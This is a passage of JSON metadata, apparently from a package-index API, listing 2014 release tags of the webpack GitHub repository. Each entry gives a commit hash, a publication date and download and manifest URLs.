hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.